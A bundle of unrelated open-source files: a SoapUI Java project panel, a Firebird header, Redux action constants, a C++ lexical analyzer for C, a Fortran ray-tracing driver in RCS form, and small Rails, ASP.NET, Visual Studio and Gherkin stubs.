/*
* SoapUI, Copyright (C) 2004-2019 SmartBear Software
*
* Licensed under the EUPL, Version 1.1 or - as soon as they will be approved by the European Commission - subsequent
* versions of the EUPL (the "Licence");
* You may not use this work except in compliance with the Licence.
* You may obtain a copy of the Licence at:
*
* http://ec.europa.eu/idabc/eupl
*
* Unless required by applicable law or agreed to in writing, software distributed under the Licence is
* distributed on an "AS IS" basis, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
* express or implied. See the Licence for the specific language governing permissions and limitations
* under the Licence.
*/
package com.eviware.soapui.impl.wsdl.panels.project;
import com.eviware.soapui.SoapUI;
import com.eviware.soapui.impl.rest.RestService;
import com.eviware.soapui.impl.rest.mock.RestMockAction;
import com.eviware.soapui.impl.rest.mock.RestMockResponse;
import com.eviware.soapui.impl.rest.mock.RestMockService;
import com.eviware.soapui.impl.support.actions.ShowOnlineHelpAction;
import com.eviware.soapui.impl.wsdl.WsdlInterface;
import com.eviware.soapui.impl.wsdl.WsdlProject;
import com.eviware.soapui.impl.wsdl.panels.teststeps.support.AbstractGroovyEditorModel;
import com.eviware.soapui.impl.wsdl.panels.teststeps.support.PropertyHolderTable;
import com.eviware.soapui.impl.wsdl.support.HelpUrls;
import com.eviware.soapui.model.ModelItem;
import com.eviware.soapui.model.iface.Interface;
import com.eviware.soapui.model.mock.MockOperation;
import com.eviware.soapui.model.mock.MockResponse;
import com.eviware.soapui.model.mock.MockService;
import com.eviware.soapui.model.project.Project;
import com.eviware.soapui.model.support.ProjectMetrics;
import com.eviware.soapui.model.testsuite.LoadTest;
import com.eviware.soapui.model.testsuite.TestAssertion;
import com.eviware.soapui.model.testsuite.TestCase;
import com.eviware.soapui.model.testsuite.TestStep;
import com.eviware.soapui.model.testsuite.TestSuite;
import com.eviware.soapui.model.util.ModelItemIconFactory;
import com.eviware.soapui.security.panels.ProjectSensitiveInformationPanel;
import com.eviware.soapui.settings.UISettings;
import com.eviware.soapui.support.DocumentListenerAdapter;
import com.eviware.soapui.support.StringUtils;
import com.eviware.soapui.support.UISupport;
import com.eviware.soapui.support.components.GroovyEditorComponent;
import com.eviware.soapui.support.components.GroovyEditorInspector;
import com.eviware.soapui.support.components.JComponentInspector;
import com.eviware.soapui.support.components.JFocusableComponentInspector;
import com.eviware.soapui.support.components.JInspectorPanel;
import com.eviware.soapui.support.components.JInspectorPanelFactory;
import com.eviware.soapui.support.components.JUndoableTextArea;
import com.eviware.soapui.support.components.JXToolBar;
import com.eviware.soapui.support.components.MetricsPanel;
import com.eviware.soapui.support.components.MetricsPanel.MetricType;
import com.eviware.soapui.support.components.MetricsPanel.MetricsSection;
import com.eviware.soapui.ui.support.ModelItemDesktopPanel;
import javax.swing.AbstractAction;
import javax.swing.Action;
import javax.swing.BorderFactory;
import javax.swing.JComponent;
import javax.swing.JPanel;
import javax.swing.JScrollPane;
import javax.swing.JTabbedPane;
import javax.swing.event.TreeModelEvent;
import javax.swing.event.TreeModelListener;
import javax.swing.text.Document;
import java.awt.BorderLayout;
import java.awt.Component;
import java.awt.Dimension;
import java.awt.event.ActionEvent;
import java.util.HashSet;
import java.util.Set;
public class WsdlProjectDesktopPanel extends ModelItemDesktopPanel<WsdlProject> {
    // These final strings are used both as keys for counters in the MetricsPanel and as
    // the actual VISIBLE labels in the user interface. They all have to be different.
protected static final String MOCKRESPONSES_STATISTICS = "WsdlMockResponses";
protected static final String MOCKOPERATIONS_STATISTICS = "WsdlMockOperations";
protected static final String MOCKSERVICES_STATISTICS = "WsdlMockServices";
protected static final String REST_MOCKRESPONSES_STATISTICS = "RestMockResponses";
protected static final String REST_MOCKACTIONS_STATISTICS = "RestMockActions";
protected static final String REST_MOCKSERVICES_STATISTICS = "RestMockServices";
protected static final String LOADTESTS_STATISTICS = "LoadTests";
protected static final String ASSERTIONS_STATISTICS = "Assertions";
protected static final String TESTSTEPS_STATISTICS = "TestSteps";
protected static final String TESTCASES_STATISTICS = "TestCases";
protected static final String TESTSUITES_STATISTICS = "TestSuites";
private PropertyHolderTable propertiesTable;
private JUndoableTextArea descriptionArea;
private InternalTreeModelListener treeModelListener;
private Set<String> interfaceNameSet = new HashSet<String>();
private WSSTabPanel wssTabPanel;
protected MetricsPanel metrics;
private GroovyEditorComponent loadScriptGroovyEditor;
private GroovyEditorComponent saveScriptGroovyEditor;
private JInspectorPanel inspectorPanel;
private WsdlProjectTestSuitesTabPanel testSuitesPanel;
private ProjectSensitiveInformationPanel sensitiveInfoPanel;
public WsdlProjectDesktopPanel(WsdlProject modelItem) {
super(modelItem);
add(buildTabbedPane(), BorderLayout.CENTER);
setPreferredSize(new Dimension(600, 600));
}
private Component buildTabbedPane() {
JTabbedPane mainTabs = new JTabbedPane();
addTabs(mainTabs);
return UISupport.createTabPanel(mainTabs, true);
}
protected void addTabs(JTabbedPane mainTabs) {
mainTabs.addTab("Overview", null, buildOverviewTab(), "Shows General Project information and metrics");
mainTabs.addTab("TestSuites", null, testSuitesPanel = buildTestSuitesTab(),
"Shows and runs all TestSuites in project");
mainTabs.addTab("WS-Security Configurations", null, buildWSSTab(), "Manages Security-related configurations");
mainTabs.addTab("Security Scan Defaults", null, buildSecConfigTab(), "Manages Security related configurations");
}
private Component buildSecConfigTab() {
sensitiveInfoPanel = new ProjectSensitiveInformationPanel(getModelItem().getConfig());
return sensitiveInfoPanel.getMainPanel();
}
public WsdlProjectTestSuitesTabPanel getTestSuitesPanel() {
return testSuitesPanel;
}
protected WsdlProjectTestSuitesTabPanel buildTestSuitesTab() {
return new WsdlProjectTestSuitesTabPanel(getModelItem());
}
protected Component buildWSSTab() {
wssTabPanel = new WSSTabPanel(getModelItem().getWssContainer());
return wssTabPanel;
}
protected Component buildOverviewTab() {
inspectorPanel = JInspectorPanelFactory.build(buildProjectOverview());
addOverviewInspectors(inspectorPanel);
inspectorPanel.setCurrentInspector("Properties");
if (StringUtils.hasContent(getModelItem().getDescription())
&& getModelItem().getSettings().getBoolean(UISettings.SHOW_DESCRIPTIONS)) {
inspectorPanel.setCurrentInspector("Description");
}
treeModelListener = new InternalTreeModelListener();
SoapUI.getNavigator().getMainTree().getModel().addTreeModelListener(treeModelListener);
updateStatistics();
return inspectorPanel.getComponent();
}
protected void addOverviewInspectors(JInspectorPanel inspectorPanel) {
inspectorPanel.addInspector(new JFocusableComponentInspector<JPanel>(buildDescriptionPanel(), descriptionArea,
"Description", "Project description", true));
inspectorPanel.addInspector(new JComponentInspector<JComponent>(buildPropertiesPanel(), "Properties",
"Project level properties", true));
inspectorPanel.addInspector(new GroovyEditorInspector(buildLoadScriptPanel(), "Load Script",
"Script to run after loading the project"));
inspectorPanel.addInspector(new GroovyEditorInspector(buildSaveScriptPanel(), "Save Script",
"Script to run before saving the project"));
}
private void updateStatistics() {
ProjectMetrics projectMetrics = new ProjectMetrics(getModelItem());
metrics.setMetric("File Path", getModelItem().getPath());
Set<String> newNames = new HashSet<String>();
boolean rebuilt = false;
for (Interface iface : getModelItem().getInterfaceList()) {
if (!metrics.hasMetric(iface.getName())) {
MetricsSection section = metrics.getSection("Interface Summary");
buildInterfaceSummary(section.clear());
rebuilt = true;
break;
}
newNames.add(iface.getName());
interfaceNameSet.remove(iface.getName());
}
if (!rebuilt) {
if (!interfaceNameSet.isEmpty()) {
MetricsSection section = metrics.getSection("Interface Summary");
buildInterfaceSummary(section.clear());
}
interfaceNameSet = newNames;
}
metrics.setMetric(TESTSUITES_STATISTICS, getModelItem().getTestSuiteCount());
metrics.setMetric(TESTCASES_STATISTICS, projectMetrics.getTestCaseCount());
metrics.setMetric(TESTSTEPS_STATISTICS, projectMetrics.getTestStepCount());
metrics.setMetric(ASSERTIONS_STATISTICS, projectMetrics.getAssertionCount());
metrics.setMetric(LOADTESTS_STATISTICS, projectMetrics.getLoadTestCount());
metrics.setMetric(MOCKSERVICES_STATISTICS, getModelItem().getMockServiceCount());
metrics.setMetric(MOCKOPERATIONS_STATISTICS, projectMetrics.getMockOperationCount());
metrics.setMetric(MOCKRESPONSES_STATISTICS, projectMetrics.getMockResponseCount());
metrics.setMetric(REST_MOCKSERVICES_STATISTICS, getModelItem().getRestMockServiceCount());
metrics.setMetric(REST_MOCKACTIONS_STATISTICS, projectMetrics.getRestMockActionCount());
metrics.setMetric(REST_MOCKRESPONSES_STATISTICS, projectMetrics.getRestMockResponseCount());
}
private JComponent buildProjectOverview() {
metrics = new MetricsPanel();
JXToolBar toolbar = buildOverviewToolbar();
metrics.add(toolbar, BorderLayout.NORTH);
MetricsSection section = metrics.addSection("Project Summary");
section.addMetric(ModelItemIconFactory.getIcon(Project.class), "File Path", MetricType.URL);
section.finish();
section = metrics.addSection("Interface Summary");
buildInterfaceSummary(section);
section = metrics.addSection("Test Summary");
section.addMetric(ModelItemIconFactory.getIcon(TestSuite.class), TESTSUITES_STATISTICS);
section.addMetric(ModelItemIconFactory.getIcon(TestCase.class), TESTCASES_STATISTICS);
section.addMetric(ModelItemIconFactory.getIcon(TestStep.class), TESTSTEPS_STATISTICS);
section.addMetric(ModelItemIconFactory.getIcon(TestAssertion.class), ASSERTIONS_STATISTICS);
section.addMetric(ModelItemIconFactory.getIcon(LoadTest.class), LOADTESTS_STATISTICS);
section.finish();
section = metrics.addSection("SOAP Mock Summary");
section.addMetric(ModelItemIconFactory.getIcon(MockService.class), MOCKSERVICES_STATISTICS);
section.addMetric(ModelItemIconFactory.getIcon(MockOperation.class), MOCKOPERATIONS_STATISTICS);
section.addMetric(ModelItemIconFactory.getIcon(MockResponse.class), MOCKRESPONSES_STATISTICS);
section.finish();
section = metrics.addSection("REST Mock Summary");
section.addMetric(ModelItemIconFactory.getIcon(RestMockService.class), REST_MOCKSERVICES_STATISTICS);
section.addMetric(ModelItemIconFactory.getIcon(RestMockAction.class), REST_MOCKACTIONS_STATISTICS);
section.addMetric(ModelItemIconFactory.getIcon(RestMockResponse.class), REST_MOCKRESPONSES_STATISTICS);
section.finish();
return new JScrollPane(metrics);
}
protected JXToolBar buildOverviewToolbar() {
JXToolBar toolbar = UISupport.createSmallToolbar();
toolbar.addGlue();
toolbar
.addFixed(UISupport.createToolbarButton(new ShowOnlineHelpAction(HelpUrls.PROJECT_OVERVIEW_HELP_URL)));
return toolbar;
}
protected void buildInterfaceSummary(MetricsSection section) {
interfaceNameSet.clear();
for (Interface ic : getModelItem().getInterfaceList()) {
if (ic instanceof WsdlInterface) {
WsdlInterface iface = (WsdlInterface) ic;
section.addMetric(iface.getIcon(), iface.getName(), MetricType.URL).set(iface.getDefinition());
} else if (ic instanceof RestService) {
RestService iface = (RestService) ic;
section.addMetric(iface.getIcon(), iface.getName(), MetricType.URL).set(iface.getWadlUrl());
}
interfaceNameSet.add(ic.getName());
}
section.finish();
}
private JPanel buildDescriptionPanel() {
JPanel panel = new JPanel(new BorderLayout());
descriptionArea = new JUndoableTextArea(getModelItem().getDescription());
descriptionArea.getDocument().addDocumentListener(new DocumentListenerAdapter() {
@Override
public void update(Document document) {
getModelItem().setDescription(descriptionArea.getText());
}
});
panel.setBorder(BorderFactory.createEmptyBorder(2, 2, 2, 2));
panel.add(new JScrollPane(descriptionArea), BorderLayout.CENTER);
UISupport.addTitledBorder(panel, "Project Description");
return panel;
}
protected GroovyEditorComponent buildLoadScriptPanel() {
loadScriptGroovyEditor = new GroovyEditorComponent(new LoadScriptGroovyEditorModel(), null);
return loadScriptGroovyEditor;
}
protected GroovyEditorComponent buildSaveScriptPanel() {
saveScriptGroovyEditor = new GroovyEditorComponent(new SaveScriptGroovyEditorModel(), null);
return saveScriptGroovyEditor;
}
private JComponent buildPropertiesPanel() {
JPanel panel = new JPanel(new BorderLayout());
propertiesTable = new PropertyHolderTable(getModelItem());
if (getModelItem() instanceof WsdlProject) {
((WsdlProject) getModelItem()).addProjectListener(propertiesTable.getProjectListener());
}
panel.add(propertiesTable, BorderLayout.CENTER);
return panel;
}
@Override
public boolean dependsOn(ModelItem modelItem) {
return modelItem == getModelItem();
}
public boolean onClose(boolean canCancel) {
propertiesTable.release();
loadScriptGroovyEditor.getEditor().release();
saveScriptGroovyEditor.getEditor().release();
SoapUI.getNavigator().getMainTree().getModel().removeTreeModelListener(treeModelListener);
wssTabPanel.release();
sensitiveInfoPanel.release();
inspectorPanel.release();
testSuitesPanel.release();
return release();
}
private final class InternalTreeModelListener implements TreeModelListener {
public void treeNodesChanged(TreeModelEvent e) {
updateStatistics();
}
public void treeNodesInserted(TreeModelEvent e) {
updateStatistics();
}
public void treeNodesRemoved(TreeModelEvent e) {
updateStatistics();
}
public void treeStructureChanged(TreeModelEvent e) {
updateStatistics();
}
}
private class LoadScriptGroovyEditorModel extends AbstractGroovyEditorModel {
public LoadScriptGroovyEditorModel() {
super(new String[]{"log", "project"}, WsdlProjectDesktopPanel.this.getModelItem(), "Load");
}
@Override
public String getScript() {
return WsdlProjectDesktopPanel.this.getModelItem().getAfterLoadScript();
}
@Override
public void setScript(String text) {
WsdlProjectDesktopPanel.this.getModelItem().setAfterLoadScript(text);
}
@Override
public Action getRunAction() {
return new AfterLoadScriptRunAction();
}
private final class AfterLoadScriptRunAction extends AbstractAction {
public AfterLoadScriptRunAction() {
putValue(Action.SMALL_ICON, UISupport.createImageIcon("/run.png"));
putValue(SHORT_DESCRIPTION, "Runs this script");
}
public void actionPerformed(ActionEvent e) {
try {
WsdlProjectDesktopPanel.this.getModelItem().runAfterLoadScript();
} catch (Exception e1) {
UISupport.showErrorMessage(e1);
}
}
}
}
private class SaveScriptGroovyEditorModel extends AbstractGroovyEditorModel {
public SaveScriptGroovyEditorModel() {
super(new String[]{"log", "project"}, WsdlProjectDesktopPanel.this.getModelItem(), "Save");
}
@Override
public String getScript() {
return WsdlProjectDesktopPanel.this.getModelItem().getBeforeSaveScript();
}
@Override
public void setScript(String text) {
WsdlProjectDesktopPanel.this.getModelItem().setBeforeSaveScript(text);
}
@Override
public Action getRunAction() {
return new BeforeSaveScriptRunAction();
}
private final class BeforeSaveScriptRunAction extends AbstractAction {
public BeforeSaveScriptRunAction() {
putValue(Action.SMALL_ICON, UISupport.createImageIcon("/run.png"));
putValue(SHORT_DESCRIPTION, "Runs this script");
}
public void actionPerformed(ActionEvent e) {
try {
WsdlProjectDesktopPanel.this.getModelItem().runBeforeSaveScript();
} catch (Exception e1) {
UISupport.showErrorMessage(e1);
}
}
}
}
}
| {
"pile_set_name": "Github"
} |
/*
* PROGRAM: JRD Command Oriented Query Language
* MODULE: show_proto.h
* DESCRIPTION: Prototype header file for show.cpp
*
* The contents of this file are subject to the Interbase Public
* License Version 1.0 (the "License"); you may not use this file
* except in compliance with the License. You may obtain a copy
* of the License at http://www.Inprise.com/IPL.html
*
* Software distributed under the License is distributed on an
* "AS IS" basis, WITHOUT WARRANTY OF ANY KIND, either express
* or implied. See the License for the specific language governing
* rights and limitations under the License.
*
* The Original Code was created by Inprise Corporation
* and its predecessors. Portions created by Inprise Corporation are
* Copyright (C) Inprise Corporation.
*
* All Rights Reserved.
* Contributor(s): ______________________________________.
*/
#ifndef QLI_SHOW_PROTO_H
#define QLI_SHOW_PROTO_H
void SHOW_stuff(qli_syntax*);
#endif // QLI_SHOW_PROTO_H
| {
"pile_set_name": "Github"
} |
// Admin
// auth
export const SET_CURRENT_USER = 'SET_CURRENT_USER';
export const FETCH_TOKEN = 'FETCH_TOKEN';
export const REMEMBER_USER = 'REMEMBER_USER';
export const UN_REMEMBER_USER = 'UN_REMEMBER_USER';
export const AUTH_ERROR = 'AUTH_ERROR';
// users
export const LOAD_USERS = 'LOAD_USERS';
export const RECEIVE_USERS = 'RECEIVE_USERS';
// goods
export const LOAD_GOODS = 'LOAD_GOODS';
export const RECEIVE_GOODS = 'RECEIVE_GOODS';
export const CREATE_SUCCESS = 'CREATE_SUCCESS';
export const CREATE_FAILURE = 'CREATE_FAILURE';
// category first
export const LOAD_CATEGORIES_FIRST = 'LOAD_CATEGORIES_FIRST';
export const FINISH_CATEGORIES_FIRST = 'FINISH_CATEGORIES_FIRST';
export const CREATE_CATEGORY_FIRST = 'CREATE_CATEGORY_FIRST';
// category second
export const LOAD_CATEGORIES_SECOND = 'LOAD_CATEGORIES_SECOND';
export const FINISH_CATEGORIES_SECOND = 'FINISH_CATEGORIES_SECOND';
export const CREATE_CATEGORY_SECOND = 'CREATE_CATEGORY_SECOND';
// service
export const SERVICE_START = 'SERVICE_START';
export const SERVICE_END = 'SERVICE_END';
// order
export const LOAD_ORDERS = 'LOAD_ORDERS';
export const RECEIVE_ORDERS = 'RECEIVE_ORDERS';
export const STATISTICS_ORDER = 'STATISTICS_ORDER'; // order statistics
export const ORDER_SERVICE_START = 'ORDER_SERVICE_START';
export const ORDER_SERVICE_END = 'ORDER_SERVICE_END';
// admin
export const LOAD_ADMIN_INFO = 'LOAD_ADMIN_INFO';
export const LOAD_ADMIN_INFO_SUCCESS = 'LOAD_ADMIN_INFO_SUCCESS';
export const LOAD_ADMIN_INFO_FAILURE = 'LOAD_ADMIN_INFO_FAILURE';
// advs
export const LOAD_ADVS = 'LOAD_ADVS';
export const LOAD_ADVS_SUCCESS = 'LOAD_ADVS_SUCCESS';
export const LOAD_ADVS_FAILURE = 'LOAD_ADVS_FAILURE';
| {
"pile_set_name": "Github"
} |
/*************************************************************************
> File Name: lexical.cpp
> Author: Netcan
> Blog: http://www.netcan666.com
> Mail: [email protected]
> Created Time: 2016-10-05 三 20:34:12 CST
__----~~~~~~~~~~~------___
. . ~~//====...... __--~ ~~
-. \_|// |||\\ ~~~~~~::::... /~
___-==_ _-~o~ \/ ||| \\ _/~~-
__---~~~.==~||\=_ -_--~/_-~|- |\\ \\ _/~
_-~~ .=~ | \\-_ '-~7 /- / || \ /
.~ .~ | \\ -_ / /- / || \ /
/ ____ / | \\ ~-_/ /|- _/ .|| \ /
|~~ ~~|--~~~~--_ \ ~==-/ | \~--===~~ .\
' ~-| /| |-~\~~ __--~~
|-~~-_/ | | ~\_ _-~ /\
/ \ \__ \/~ \__
_--~ _/ | .-~~____--~-/ ~~==.
((->/~ '.|||' -_| ~~-/ , . _||
-_ ~\ ~~---l__i__i__i--~~_/
_-~-__ ~) \--______________--~~
//.-~~~-~_--~- |-------~~~~~~~~
//.-~~~--\
                  May the divine beast bless this code to stay bug-free!
*************************************************************************/
#include "lexical.h"
void Key::add(const string &str, int loc) {
Trie *p = this->root, *q;
for(unsigned int i=0; i<str.length(); ++i) {
int id = str[i] - 'a';
if(p->next[id] == NULL) {
q = new Trie();
p->next[id] = q;
}
p = p->next[id];
}
p->isEnd = true;
p->loc = loc;
}
void Key::add(vector<string> strs) {
int loc = 0;
for(auto str : strs) {
this->add(str, loc++);
}
}
int Key::find(const string &str) {
Trie *p = this->root;
for(unsigned int i=0; i<str.length(); ++i) {
int id = str[i] - 'a';
if(id < 0 || id >= 26)
return -1;
p = p->next[id];
if(p == NULL) return -1;
}
if(p->isEnd) return p->loc;
else return -1;
}
void Key::free(Trie *p) {
if(p == NULL) return;
for(int i=0; i<26; ++i) this->free(p->next[i]);
delete p;
}
template<class T, size_t n> // pointer to one past the end of the array
T* tail(T (&a)[n]) {
return a+n;
}
Lexical::Lexical() {
const char * ks[] = { // keyword table
"auto", "double", "int", "struct", "break", "else", "long",
"switch","case", "enum", "register", "typedef", "char",
"extern", "return", "union","const", "float", "short",
"unsigned", "continue", "for", "signed", "void","default",
"goto", "sizeof", "volatile", "do", "if", "while", "static"
};
keys.add(vector<string>(ks, tail(ks)));
// delimiters
optrs.push_back(make_pair(",", DELIMITER));
optrs.push_back(make_pair(";", DELIMITER));
optrs.push_back(make_pair("(", DELIMITER));
optrs.push_back(make_pair(")", DELIMITER));
optrs.push_back(make_pair("[", DELIMITER));
optrs.push_back(make_pair("]", DELIMITER));
optrs.push_back(make_pair("{", DELIMITER));
optrs.push_back(make_pair("}", DELIMITER));
// arithmetic operators
optrs.push_back(make_pair("+", ARITHMETICOPTR));
optrs.push_back(make_pair("-", ARITHMETICOPTR));
optrs.push_back(make_pair("*", ARITHMETICOPTR));
optrs.push_back(make_pair("/", ARITHMETICOPTR));
optrs.push_back(make_pair("%", ARITHMETICOPTR));
optrs.push_back(make_pair("++", ARITHMETICOPTR));
optrs.push_back(make_pair("--", ARITHMETICOPTR));
// relational operators
optrs.push_back(make_pair(">", RELATIONOPTR));
optrs.push_back(make_pair(">=", RELATIONOPTR));
optrs.push_back(make_pair("<", RELATIONOPTR));
optrs.push_back(make_pair("<=", RELATIONOPTR));
optrs.push_back(make_pair("==", RELATIONOPTR));
optrs.push_back(make_pair("<>", RELATIONOPTR));
optrs.push_back(make_pair("=", RELATIONOPTR));
row = column = 0;
isFirst = true;
}
string Lexical::cut(int i, int j) {
return string(in.begin() + i, in.begin() + j);
}
bool Lexical::isKey(const string &str) {
if(keys.find(str) != -1) return true;
else return false;
}
int Lexical::getKeyPointer(const string &str) {
return keys.find(str);
}
bool Lexical::isOptr(const string &str) {
for(auto opt:optrs)
if(opt.first == str) return true;
return false;
}
int Lexical::getOptrPointer(const string &str) {
vector<pair<string, Type> >::iterator it;
for(it = optrs.begin(); it != optrs.end() && it->first != str; ++it);
return it - optrs.begin();
}
Type Lexical::getOptrType(const string &str) {
vector<pair<string, Type> >::iterator it;
for(it = optrs.begin(); it != optrs.end() && it->first != str; ++it);
if(it != optrs.end())
return it->second;
else return ERROR;
}
bool Lexical::isId(const string &str) {
if(!isalpha(str.c_str()[0]) && str.c_str()[0] != '_')
return false;
for(auto c: str)
if(!isalnum(c) && c != '_') return false;
return true;
}
int Lexical::getIDPointer(const string &str) {
vector<pair<string, Type> >::iterator it = find(indetifiers.begin(), indetifiers.end(), make_pair(str, ID));
if(it != indetifiers.end()) // found
return it - indetifiers.begin();
else {
indetifiers.push_back(make_pair(str, ID));
return indetifiers.size() - 1;
}
}
bool Lexical::isNum(const string &str) {
for(auto c:str)
if(!isdigit(c)) return false;
return true;
}
int Lexical::getNumPointer(const string &str) {
vector<pair<string, Type> >::iterator it = find(constants.begin(), constants.end(), make_pair(str, NUMBER));
if(it != constants.end()) // found
return it - constants.begin();
else {
constants.push_back(make_pair(str, NUMBER));
return constants.size() - 1;
}
}
bool Lexical::isString(const string &str) { // is this a string?
return true;
}
int Lexical::getStringPointer(const string &str) {
vector<pair<string, Type> >::iterator it = find(strings.begin(), strings.end(), make_pair(str, STRING));
if(it != strings.end()) // found
return it - strings.begin();
else {
strings.push_back(make_pair(str, STRING));
return strings.size() - 1;
}
}
bool Lexical::isChar(const string &chr) {
if(chr.length() == 1 || (chr[0] == '\\' && chr.length() == 2))
return true;
else
return false;
}
int Lexical::getCharPointer(const string &chr) {
vector<pair<char, Type> >::iterator it = find(chars.begin(), chars.end(), make_pair(chr.c_str()[0], CHAR));
if(it != chars.end()) // found
return it - chars.begin();
else {
chars.push_back(make_pair(chr.c_str()[0], CHAR));
return chars.size() - 1;
}
};
bool Lexical::getIn() {
++row;
return getline(cin, in);
}
void Lexical::analysis() {
unsigned int j = 0;
for(column = 0; column < in.length(); ++column) {
char c = in.c_str()[column];
if(isalpha(c)) {
for(j = column+1; j < in.length() && (isalnum(in[j]) || in[j] == '_'); ++j); // automaton for matching a keyword or identifier
string s = cut(column, j);
if(!isFirst) printf(", ");
else isFirst = false;
if(isKey(s))
printf("{\"word\": \"%s\", \"tuple\": [%d, %d], \"type\": \"%s\", \"pos\": [%d, %d]}\n", s.c_str(), KEY, getKeyPointer(s), typeStr[KEY], row, column+1);
else if(isId(s))
printf("{\"word\": \"%s\", \"tuple\": [%d, %d], \"type\": \"%s\", \"pos\": [%d, %d]}\n", s.c_str(), ID, getIDPointer(s), typeStr[ID], row, column+1);
else
printf("{\"word\": \"%s\", \"tuple\": [%d, %d], \"type\": \"%s\", \"pos\": [%d, %d]}\n", s.c_str(), ERROR, ERROR, typeStr[ERROR], row, column+1);
column = j-1;
}
else if(isdigit(c)) {
for(j = column+1; j < in.length() && (isalnum(in[j]) || in[j] == '_'); ++j); // automaton for matching a numeric literal
string s = cut(column, j);
if(!isFirst) printf(", ");
else isFirst = false;
if(isNum(s))
printf("{\"word\": \"%s\", \"tuple\": [%d, %d], \"type\": \"%s\", \"pos\": [%d, %d]}\n", s.c_str(), NUMBER, getNumPointer(s), typeStr[NUMBER], row, column+1);
else
printf("{\"word\": \"%s\", \"tuple\": [%d, %d], \"type\": \"%s\", \"pos\": [%d, %d]}\n", s.c_str(), ERROR, ERROR, typeStr[ERROR], row, column+1);
column = j - 1;
}
else if(c == '/' && in[column+1] == '/') { // comment
for(column += 2; column < in.length() && isspace(in[column]); ++column);
string s = cut(column, in.length());
if(!isFirst) printf(", ");
else isFirst = false;
printf("{\"word\": \"%s\", \"tuple\": [%d, %d], \"type\": \"%s\", \"pos\": [%d, %d]}\n", s.c_str(), COMMENT, 0, typeStr[COMMENT], row, column+1);
column = in.length();
}
else if(isOptr(string(1, c))){
for(j = column+1; j < in.length() && isOptr(string(1, in[j])) && getOptrType(string(1, in[j])) != DELIMITER && getOptrType(string(1, in[j])) == getOptrType(string(1,c)); ++j); // operator automaton
string s = cut(column, j);
if(!isFirst) printf(", ");
else isFirst = false;
if(isOptr(s))
printf("{\"word\": \"%s\", \"tuple\": [%d, %d], \"type\": \"%s\", \"pos\": [%d, %d]}\n", s.c_str(), getOptrType(s), getOptrPointer(s), typeStr[getOptrType(s)], row, column+1);
else
printf("{\"word\": \"%s\", \"tuple\": [%d, %d], \"type\": \"%s\", \"pos\": [%d, %d]}\n", s.c_str(), ERROR, ERROR, typeStr[ERROR], row, column+1);
column = j - 1;
}
else if(c == '"' || c == '\'') { // 字符串
for(j = column+1; j < in.length() && ( (in[j]=='\\' && ++j) || in[j] != c); ++j); // 字符(串)自动机
string s = cut(column+1, j);
// printf("%s(%ld)\n", s.c_str(), s.length());
if(!isFirst) printf(", ");
else isFirst = false;
if(c == '"' && j < in.length())
printf("{\"word\": \"%s\", \"tuple\": [%d, %d], \"type\": \"%s\", \"pos\": [%d, %d]}\n", s.c_str(), STRING, getStringPointer(s), typeStr[STRING], row, column+1);
else if(c == '\'' && isChar(s))
printf("{\"word\": \"%s\", \"tuple\": [%d, %d], \"type\": \"%s\", \"pos\": [%d, %d]}\n", s.c_str(), CHAR, getCharPointer(s), typeStr[CHAR], row, column+1);
else
printf("{\"word\": \"%s\", \"tuple\": [%d, %d], \"type\": \"%s\", \"pos\": [%d, %d]}\n", s.c_str(), ERROR, ERROR, typeStr[ERROR], row, column+1);
column = j;
}
else if(!isspace(c)) {
if(!isFirst) printf(", ");
else isFirst = false;
if(c=='"')
printf("{\"word\": \"\\\"\", \"tuple\": [%d, %d], \"type\": \"%s\", \"pos\": [%d, %d]}\n", ERROR, ERROR, typeStr[ERROR], row, column+1);
else
printf("{\"word\": \"%s\", \"tuple\": [%d, %d], \"type\": \"%s\", \"pos\": [%d, %d]}\n", string(1,c).c_str(), ERROR, ERROR, typeStr[ERROR], row, column+1);
}
}
}
void Lexical::run() {
while(getIn()) {
analysis();
}
}
int main() {
Lexical lex;
lex.run();
return 0;
}
| {
"pile_set_name": "Github"
} |
<%@ Application Codebehind="Global.asax.cs" Inherits="MVCMusicStore.MvcApplication" Language="C#" %>
| {
"pile_set_name": "Github"
} |
head 1.1;
access;
symbols;
locks; strict;
comment @c @;
1.1
date 97.01.31.18.01.22; author john; state Exp;
branches;
next ;
desc
@triso
@
1.1
log
@Initial revision
@
text
@*********************************************************
* *
* TRISO: Ray Tracing over Tabular Transversely *
* Isotropic Media. *
* *
* Author: Sebastien Geoltrain *
* *
* Copyrights: Center for Wave Phenomena, *
* Mathematics Department, *
* Colorado School of Mines, *
* Golden, CO 80401. *
* *
* All Rights Reserved. *
* *
*********************************************************
integer stdin, stdout, stderr, temp1, temp2, temp3
common /io/ stdin, stdout, stderr, temp1, temp2, temp3
* Definition of logical unit numbers
* ... to be modified to comply with your system
stdin = 5
stdout = 6
stderr = 0
temp1 = 10
temp2 = 20
temp3 = 30
* call to the ray tracing code
call cshotprof()
stop
end
@
| {
"pile_set_name": "Github"
} |
class ApplicationController < ActionController::Base
protect_from_forgery
end
| {
"pile_set_name": "Github"
} |
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 14
VisualStudioVersion = 14.0.25420.1
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "VSTProject", "VSTProject.vcxproj", "{16F7AB3C-1AE0-4574-B60C-7B4DED82938C}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{16F7AB3C-1AE0-4574-B60C-7B4DED82938C}.Debug|x64.ActiveCfg = Debug|x64
{16F7AB3C-1AE0-4574-B60C-7B4DED82938C}.Debug|x64.Build.0 = Debug|x64
{16F7AB3C-1AE0-4574-B60C-7B4DED82938C}.Debug|x86.ActiveCfg = Debug|Win32
{16F7AB3C-1AE0-4574-B60C-7B4DED82938C}.Debug|x86.Build.0 = Debug|Win32
{16F7AB3C-1AE0-4574-B60C-7B4DED82938C}.Release|x64.ActiveCfg = Release|x64
{16F7AB3C-1AE0-4574-B60C-7B4DED82938C}.Release|x64.Build.0 = Release|x64
{16F7AB3C-1AE0-4574-B60C-7B4DED82938C}.Release|x86.ActiveCfg = Release|Win32
{16F7AB3C-1AE0-4574-B60C-7B4DED82938C}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
| {
"pile_set_name": "Github"
} |
@ignore
@dataservice
@delete-environment
Feature: Delete environment
